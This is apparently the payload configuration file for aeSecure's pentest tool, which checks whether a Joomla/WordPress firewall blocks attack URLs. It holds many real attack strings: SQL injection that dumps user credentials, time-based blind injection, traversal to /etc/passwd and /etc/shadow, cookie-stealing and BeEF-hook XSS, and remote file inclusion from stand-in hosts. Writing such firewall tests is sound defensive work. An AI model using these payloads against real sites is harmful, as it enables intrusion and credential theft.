| Current Path : /home/bijouxly/old/aesecure/tools/pentest/ |
| Current File : /home/bijouxly/old/aesecure/tools/pentest/pentest.json |
{
"urls":{
"000":{
"info":"Please activate option 2.3 first",
"enabled":"0",
"samples":
[
{"POST /wp-admin/theme-editor.php":"1"},
{"/wp-admin/index.php":"1"},
{"/wp-cron.php?doing_wp_cron=1410217472.9090061187744140625000":"1"}
]
},
"23":{
"info":"Please activate option 2.3 first",
"enabled":"1",
"samples":
[
{"dummy.php?postmsg=impotence":"1"}
]
},
"26":{
"info":"Please activate option 1.1 first",
"enabled":"1",
"samples":
[
{"$ROOT/.htaccess":"1"},
{"$ROOT/aesecure/tools/pentest/tests/.htpasswd":"1"},
{"$ROOT/aesecure/tools/pentest/tests/.secrets":"1"}
]
},
"42":{
"info":"Please activate option 4.2 first. Block Joomla!® frontend registration URL",
"enabled":"1",
"samples":
[
{"$ROOT/index.php?option=com_users&view=registration":"1"}
]
},
"44":{
"info":"You can control here the components/modules blocked by aeSecure by using option 4.4",
"enabled":"1",
"samples":
[
{"dummy.php?option=com_maianmedia&action=upload":"1"},
{"/components/com_jnewsletter/":"1"},
{"/modules/mod_araticlhess/":"1"}
]
},
"148":{
"info":"You can control the list of blocked files with 1.7. Please enable it to block these files.",
"enabled":"1",
"samples":
[
{"boot.ini":"1"},
{"dummy.php?..\\../..\\../boot.ini":"1"},
{"dummy.php?..%5c..%5c..%5c..%5c..%5c..%5cc/boot.ini":"1"},
{"$ROOT/CHANGELOG.php":"1"},
{"$ROOT/CHANGELOG.txt":"1"},
{"$ROOT/configuration.php":"1"},
{"$ROOT/CONTRIBUTING.md":"1"},
{"$ROOT/COPYRIGHT.php":"1"},
{"$ROOT/CREDITS.php":"1"},
{"$ROOT/htaccess.txt":"1"},
{"$ROOT/INSTALL.mysql.txt":"1"},
{"$ROOT/INSTALL.pgsql.txt":"1"},
{"$ROOT/INSTALL.sqlite.txt":"1"},
{"$ROOT/INSTALL.txt":"1"},
{"$ROOT/joomla.xml":"1"},
{"$ROOT/LICENSE.php":"1"},
{"$ROOT/LICENSE.txt":"1"},
{"$ROOT/MAINTAINERS.txt":"1"},
{"php.ini":"1"},
{"$ROOT/php.ini":"1"},
{"$ROOT/readme.html":"1"},
{"$ROOT/readme.txt":"1"},
{"$ROOT/UPGRADE.txt":"1"},
{"$ROOT/web.config":"1"},
{"$ROOT/web.config.txt":"1"},
{"$ROOT/dummy.jsp":"1"},
{"$ROOT/dummy.asp":"1"},
{"$ROOT/dummy.aspx":"1"},
{"$ROOT/dummy.phtml":"1"},
{"$ROOT/robots.txt.dist":"1"},
{"dummy.php?../../../../../etc/apache2/httpd.conf":"1"},
{"dummy.php?action=revslider_show_image&img=../wp-config.php":"1"}
]
},
"271":{
"info":"Please activate option 1.1 first",
"enabled":"1",
"remark":"Carriage return, line feed, single quote, escape characters are not allowed in the querystring",
"samples":
[
{"dummy.php?option=com_search&task=search&option=d'kc%22z'gj'%22%2A%2A5%2A(((%3B-%2A%60)&searchword=Search%20Here..":"1"},
{"dummy.php?data=title%22%3A%22this+is+a+test%3E%3C%7D":"1"},
{"dummy.php?option=com_users&task=..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini%00.":"1"},
{"dummy.php?...-1+union+select+1,2,group_concat(0x3C6B65793E,username,0x3a,password,0x3a,usertype,0x3a,0x3C62723E,0x3C6B6579733E)KHG,4,5,6,7,8,9,10+from+jos_users+where+usertype='Super%20Administrator'+or+usertype='Administrator'%20":"1"},
{"dummy.php?...%3Etruncate+":"1"},
{"dummy.php?...%3Cdrop+":"1"},
{"dummy.php?format=html%27%22":"1"},
{"dummy.php?/etc/passwd%00":"1"},
{"dummy.php?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='":"1"},
{"dummy.php?\"><img src=M onerror=window.location.replace('http://google.com');>":"1"},
{"dummy.php?../../../../../../etc/shadow&=%3C%3C%3C%3C%3C":"1"},
{"dummy.php?...%3E+union+":"1"},
{"dummy.php?view=article&id=422&Itemid=713&option=com_content'%20%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72)%20from%20%60information_schema%60.tables%20limit%200,1))%20from%20%60information_schema%60.tables%20limit%200,1),floor(rand(0)*2))x%20from%20%60information_schema%60.tables%20group%20by%20x)a)%20and%207=7%20%20and%20''='":"1"},
{"dummy.php?username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%20'1 ":"1"},
{"dummy.php?title=<meta%20http-equiv='refresh'%20content='0;'>":"1"},
{"dummy.php?subject=test'+UnION+SELECT+LOad_File+(+0x2f657":"1"},
{"dummy.php?;waitfor delay '0:0:__TIME__'--":"1"},
{"dummy.php?);waitfor delay '0:0:__TIME__'--":"1"},
{"dummy.php?';waitfor delay '0:0:__TIME__'--":"1"},
{"dummy.php?\";waitfor delay '0:0:__TIME__'--":"1"},
{"dummy.php?Password:*/=1--":"1"},
{"dummy.php?UNI/**/ON SEL/**/ECT":"1"},
{"dummy.php?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e":"1"},
{"dummy.php?'/**/OR/**/1/**/=/**/1":"1"},
{"dummy.php?' or 1/*":"1"}
]
},
"310":{
"info":"Please activate option 1.1 first",
"enabled":"1",
"samples":
[
{"$ROOT/index.php?c=PHPSESSID%3Dvmcsjsgear6gsogpu7o2imr9f3":"1"}
]
},
"345":{
"info":"Please activate option 1.1 first",
"enabled":"1",
"samples":
[
{"dummy.php?ImageName=base64_encode(%22I'm%20an%20hacker...%20Tadaaa%22)":"1"}
]
},
"352":{
"info":"Please activate option 1.1 first",
"enabled":"1",
"samples":
[
{"dummy.php?...String.fromcharcode...":"1"}
]
},
"403":{
"info":"403 - Access denied - .htaccess deny",
"enabled":"1",
"samples":
[
{"$ROOT/.htaccess":"1"},
{"$ROOT/cache/badscript.php":"1"},
{"$ROOT/aesecure/.htaccess":"1"}
]
},
"429":{
"info":"Please activate option 1.1 first",
"enabled":"1",
"samples":
[
{"dummy.php?\";alert('XSS');":"1"},
{"dummy.php?value=;function(":"1"},
{"dummy.php?task=base64_encode":"1"},
{"dummy.php?,function(){respField.html(response).fadeIn(":"1"},
{"$ROOT/index.php?var=eval(":"1"},
{"dummy.php?var=eval(":"1"},
{"dummy.php?wwwroot":"1"},
{"dummy.php?<img onerror=alert(1) src=a>":"1"},
{"dummy.php?public_html":"1"},
{"dummy.php?name=guest<script>alert('attacked')</script>":"1"},
{"dummy.php?<script>alert(String.fromCharCode(88,83,83))</script>":"1"},
{"$ROOT/index.php?<script>alert("attacked")</script>":"1"},
{"index.html?default=<script>alert(document.cookie)</script>":"1"},
{"dummy.php?1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;":"1"},
{"dummy.php?' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));":"1"},
{"dummy.php?name=guest<script>alert('attacked')</script>":"1"},
{"dummy.php?\"><img src=M onerror=alert('test');>":"1"}
]
},
"490":{
"info":"Please activate option 1.1 first",
"enabled":"1",
"samples":
[
{"dummy.php?page=../../../../proc/self/environ":"1"},
{"dummy.php?etc/passwd":"1"},
{"dummy.php?..\\..\\test.bat":"1"},
{"dummy.php?..%5C..\\test.bat":"1"},
{"dummy.php?cmd=chmod ":"1"},
{"dummy.php?...etc/passwd...":"1"},
{"dummy.php?...proc\/self\/environ":"1"},
{"dummy.php?exec=whoami":"1"},
{"dummy.php?option=com_ckforms&controller=../../../../../../../..//proc/self/environ":"1"},
{"dummy.php?etc/passwd":"1"},
{"dummy.php?../etc/passwd":"1"},
{"dummy.php?../../etc/passwd":"1"},
{"dummy.php?cmd=../../etc/passwd":"1"},
{"dummy.php?../../../etc/passwd":"1"},
{"dummy.php?../../../../etc/passwd":"1"},
{"dummy.php?../../../../boot/grub/grub.conf":"1"},
{"dummy.php?../../../../../var/log":"1"},
{"dummy.php?..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd":"1"},
{"dummy.php?%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd":"1"},
{"dummy.php?..\\..\\..\\../c/boot.ini":"1"},
{"dummy.php?/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd":"1"},
{"dummy.php/?id=72&L=3//assets/...ery/wievtopic.txt%3F%3F":"1"},
{"dummy.php?id=15&L=3%2F%2Fassets%2F...og%2Fpub%2Fidxx.txt%3F%3F%2F%2Fassets%2Fsnippets%2Freflect%2Fsnippet.reflect.php%3Freflect_base%3D":"1"}
]
},
"541":{
"info":"Please activate option 1.1 first",
"enabled":"1",
"samples":
[
{"dummy.php?%3Cscript%3Ealert%28%27Msg%27%29;%3C/script%3E":"1"},
{"dummy.php?name=%3Cscript%3Ealert%2842%29;%3C/script%3E":"1"},
{"dummy.php?%3Ctable%20background=%22javascript:alert(([code])%22%3E%3C/table%3E":"1"},
{"dummy.php?v=<script>doBadThings()":"1"},
{"dummy.php?v=<script>doBadThings();</script>":"1"},
{"dummy.php?<script language=”javascript”>window.location.href = ”beeftrap.html” ; </script>":"1"},
{"dummy.php?<scr<script>ipt>alert(xss)</scr</script>ipt>":"1"},
{"dummy.php?<script>alert(‘xss’);</script>":"1"},
{"dummy.php?<ScRiPt>alert(1)</ScRiPt>":"1"},
{"dummy.php?name=<script>var link=document.getElementsByTagName('a');link[0].href=''http://badsite.com'</script>":"1"},
{"dummy.php?aaaa”><script>alert(1)</script>":"1"},
{"dummy.php?<script src=”http://beefhook.js”></script>":"1"},
{"dummy.php?<script><script>alert(1)</script>":"1"},
{"dummy.php?name=<script>window.onload = function() {var link=document.getElementsByTagName('a');link[0].href='http://badsite.com/';}</script>":"1"},
{"dummy.php?%00<script>alert(1)</script>":"1"},
{"dummy.php?<script>prompt(’1’)</script>":"1"},
{"dummy.php?”><script>alert(document.cookie)</script>":"1"},
{"dummy.php?‘><script>alert(document.cookie)</script>":"1"},
{"dummy.php?name=<script>window.onload = function() {var link=document.getElementsByTagName('a');link[0].href='http://badsite.com/';}</script>":"1"},
{"dummy.php?task=blabla\"--> </style><script>alert(0x00018D)</script>":"1"}
]
},
"654": {
"info":"Please activate option 1.1 first",
"enabled":"1",
"samples":
[
{"dummy.php?GLOBALS=&mosConfig_absolute_path=http://badsite/images/err.txt":"1"},
{"dummy.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1":"1"}
]
},
"682":{
"info":"Please activate option 1.1 first",
"enabled":"1",
"samples":
[
{"dummy.php?1 OR 1=1":"1"},
{"dummy.php?’ OR 1=1 ":"1"},
{"dummy.php?” OR 1=1 --’":"1"},
{"dummy.php?OR 1=1;":"1"},
{"dummy.php?1 AND 1=1":"1"},
{"dummy.php?x’ OR ’1’=’1":"1"},
{"dummy.php?‘ OR 1 in (@@version)--":"1"},
{"dummy.php?‘ UNION (select @@version) --":"1"},
{"dummy.php?1 OR sleep(___TIME___)#":"1"},
{"dummy.php?’ OR sleep(___TIME___)#":"1"},
{"dummy.php?” OR sleep(___TIME___)#":"1"},
{"dummy.php?1 or benchmark(10000000,MD5(1))#":"1"},
{"dummy.php?’ or benchmark(10000000,MD5(1))#":"1"},
{"dummy.php?” or benchmark(10000000,MD5(1))#":"1"},
{"dummy.php?OR 1=1 ORDER BY table_name DESC":"1"},
{"dummy.php?x’; UPDATE table SET value WHERE user=’x":"1"},
{"dummy.php?1’; INSERT INTO table VALUES(‘value’,‘value’);--":"1"},
{"dummy.php?101 AND (SELECT ASCII(SUBSTR(name,1,1)) FROM table WHERE foo=n)$ --":"1"},
{"dummy.php?’ union select null,LOAD_FILE(’../../../../../etc/passwd’),null,null,null --":"1"},
{"dummy.php?id=10||UTL_INADDR.GET_HOST_NAME( (SELECT user FROM DUAL) )--":"1"},
{"dummy.php?...from+jos_users+where+usertype":"1"},
{"dummy.php?id=10 UNION SELECT 1,null,null--":"1"},
{"dummy.php?id=10 ORDER BY 10--":"1"},
{"dummy.php?...+union+select+1,2,group_concat(...9,10+from+jos_users+where+usertype=":"1"},
{"dummy.php?'||(elt(-3+5,bin(15),ord(10),hex(char(45))))":"1"},
{"dummy.php?||6":"1"},
{"dummy.php?'||'6":"1"},
{"dummy.php?(||6)":"1"},
{"dummy.php?' OR 1=1-- ":"1"},
{"dummy.php?OR 1=1":"1"},
{"dummy.php?' OR '1'='1":"1"},
{"dummy.php?; OR '1'='1'":"1"},
{"dummy.php?%22+or+isnull%281%2F0%29+%2F*":"1"},
{"dummy.php?%27+OR+%277659%27%3D%277659":"1"},
{"dummy.php?%22+or+isnull%281%2F0%29+%2F*":"1"},
{"dummy.php?%27+--+":"1"},
{"dummy.php?' or 1=1--":"1"},
{"dummy.php?\" or 1=1--":"1"},
{"dummy.php?' or 1=1 /*":"1"},
{"dummy.php?or 1=1--":"1"},
{"dummy.php?' or 'a'='a":"1"},
{"dummy.php?') or ('a'='a":"1"},
{"dummy.php?Admin' OR '":"1"},
{"dummy.php?'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--":"1"},
{"dummy.php?) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;":"1"},
{"dummy.php?' having 1=1--":"1"},
{"dummy.php?' having 1=1--":"1"},
{"dummy.php?' group by userid having 1=1--":"1"},
{"dummy.php?' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--":"1"},
{"dummy.php?' or 1 in (select @@version)--":"1"},
{"dummy.php?' union all select @@version--":"1"},
{"dummy.php?' OR 'unusual' = 'unusual'":"1"},
{"dummy.php?' OR 'something' = 'some'+'thing'":"1"},
{"dummy.php?' OR 'text' = N'text'":"1"},
{"dummy.php?' OR 'something' like 'some%'":"1"},
{"dummy.php?' OR 2 > 1":"1"},
{"dummy.php?' OR 'text' > 't'":"1"},
{"dummy.php?' OR 'whatever' in ('whatever')":"1"},
{"dummy.php?' OR 2 BETWEEN 1 and 3":"1"},
{"dummy.php?' or username like char(37);":"1"},
{"dummy.php?' union select * from users where login = char(114,111,111,116);":"1"},
{"dummy.php?' union select ":"1"},
{"dummy.php?'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'":"1"},
{"dummy.php?'; EXEC ('SEL' + 'ECT US' + 'ER')":"1"},
{"dummy.php?+or+isnull%281%2F0%29+%2F*":"1"},
{"dummy.php?%27+OR+%277659%27%3D%277659":"1"},
{"dummy.php?%22+or+isnull%281%2F0%29+%2F*":"1"},
{"dummy.php?%27+--+&password=":"1"},
{"dummy.php?'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > ":"1"},
{"dummy.php? @var select @var as var into temp end --":"1"},
{"dummy.php?' and 1 in (select var from temp)--":"1"},
{"dummy.php?' union select 1,load_file('/etc/passwd'),1,1,1;":"1"},
{"dummy.php?id=1%20union%20select%201,2,3,4,5,6,7,8,group_concat(user_login,char(58),user_pass,char(58),user_email),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%20from%20wp_users–":"1"},
{"dummy.php?id=10 AND IF(version() like ‘5%’, sleep(10), ‘false’))--":"1"},
{"dummy.php?id=10||UTL_HTTP.request(‘testerserver.com:80’||(SELECT user FROM DUAL)--":"1"}
]
},
"758":{
"info":"<span style='font-weight:bold;color:green;'>Be carefull : the result will be 'status 200' when executed from your localhost or by your own server.</span>",
"remark":"PHP Easter Eggs no more blocked on the server himself",
"enabled":"0",
"samples":
[
{"$ROOT/index.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42":"1"},
{"dummy.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42":"1"},
{"dummy.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42":"1"},
{"dummy.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42":"1"},
{"dummy.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000":"1"}
]
},
"782":{
"info":"<span style='font-weight:bold;color:green;'>URLs in URL are only blocked when the call isn't made by the server himself. The status here, in the pentest tool, can be 200 and it's OK.</span>",
"remark":"URL in URL are no more blocked by aeSecure since v2.0 when the URL is executed from the server himself. This test has no more added-value.",
"enabled":"0",
"samples":
[
{"dummy.php?dest=http:\/\/www.badsite.com/stealInfo.jsp":"1"},
{"dummy.php?dest=https://www.badsite.com/stealInfo.jsp":"1"},
{"$ROOT/index.php/?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://badsite/info.txt":"1"},
{"dummy.php?task=do_something&value=http://badsite/hack.txt":"1"},
{"dummy.php?src=http%3A%2F%2Fbadsite.com%2Fattack.php ":"1"},
{"dummy.php?src=http://www.badsite/scripts/samp.php":"1"}
]
},
"other":{
"info":"Block access to specific requests; mainly blocked by option 1.1",
"enabled":"0",
"samples":
[
{"dummy.php?sa=U&ei=badThing&ved=badThing&usg=badThing-dYoO1zgWOA//images/stories/fold.gif":"1"},
{"dummy.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager":"1"},
{"$ROOT/components/com_jce/jce.php":"1"},
{"xmlrpc/test.php":"1"},
{"php-ofc-library/upload.php":"1"},
{"$ROOT/index.php++++++++++++++++++++++++++++++++++++Result:+no+post+sending+forms+are+found;":"1"},
{"$ROOT/components/badscript.php":"1"},
{"$ROOT/modules/badscript.php":"1"},
{"$ROOT/plugins/badscript.php":"1"},
{"$ROOT/stories/badscript.php":"1"},
{"$ROOT/images/badscript.php":"1"},
{"$ROOT/templates/badscript.php":"1"},
{"$ROOT/tmp-upload-images/badscript.php":"1"},
{"dummy.php?tmpl=offline":"1"},
{"dummy.php?tmpl=system":"1"},
{"$ROOT/tmp/attack.php":"1"},
{"$ROOT/log/download.zip":"1"},
{"$ROOT/cache/index.html":"1"},
{"$ROOT/administrator/components/com_admin/admin.xml":"1"},
{"dummy.php?option=com_media&task=file.upload&41e05467f7466=99ed=1&asset=com_content":"1"}
]
}
}
}